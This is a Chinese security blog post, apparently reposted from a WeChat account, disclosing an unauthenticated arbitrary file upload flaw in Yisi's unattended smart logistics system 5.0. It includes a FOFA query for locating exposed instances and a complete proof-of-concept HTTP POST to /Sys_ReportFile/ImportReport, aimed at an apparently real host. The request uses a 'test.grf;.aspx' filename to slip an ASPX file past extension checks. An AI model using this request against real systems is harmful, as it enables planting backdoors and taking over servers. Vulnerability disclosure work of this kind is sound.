易思智能物流无人值守系统文件上传漏洞

admin

102369
文章

87
评论

2023年9月23日14:36:07评论52 views字数 849阅读2分49秒阅读模式

0x01 漏洞概述

易思无人值守智能物流系统/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞，未经授权的攻击者可通过此漏洞上传恶意后门文件，从而获取服务器权限。

0x02 影响范围

易思智能物流无人值守系统5.0文章来源地址:https://www.yii666.com/blog/663572.html

0x03 复现环境

FOFA："智能物流无人值守系统"网址:yii666.com

易思智能物流无人值守系统文件上传漏洞

0x04 漏洞复现

PoC

POST /Sys_ReportFile/ImportReport?encode=a HTTP/1.1Host: tgys.tslyjt.com:8001X-File-Name: test.grfUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: multipart/form-data; boundary= ----WebKitFormBoundaryxzUhGld6cusN3AlkAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 209
------WebKitFormBoundaryxzUhGld6cusN3AlkContent-Disposition: form-data; name="file"; .filename="test.grf;.aspx"Content-Type: application/octet-stream
qax-test------WebKitFormBoundaryxzUhGld6cusN3Alk--

易思智能物流无人值守系统文件上传漏洞

原文始发于微信公众号（悟空安全）：易思智能物流无人值守系统文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

易思智能物流无人值守系统文件上传漏洞

0x01 漏洞概述

0x02 影响范围

0x03 复现环境

0x04 漏洞复现

使用 SeImpersonateToken 权限从 NT 服务到 SYSTEM 的反射 DLL

ebpf在Android安全上的应用：结合binder完成一个行为检测沙箱(下篇)

浅谈Kubernetes安全

若依系统恰分攻略

HW必备技能教学之Windows应急响应常见流程【附应急工具】

技术实践｜大模型内容安全蓝军的道与术

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

发表评论

在线咨询

微信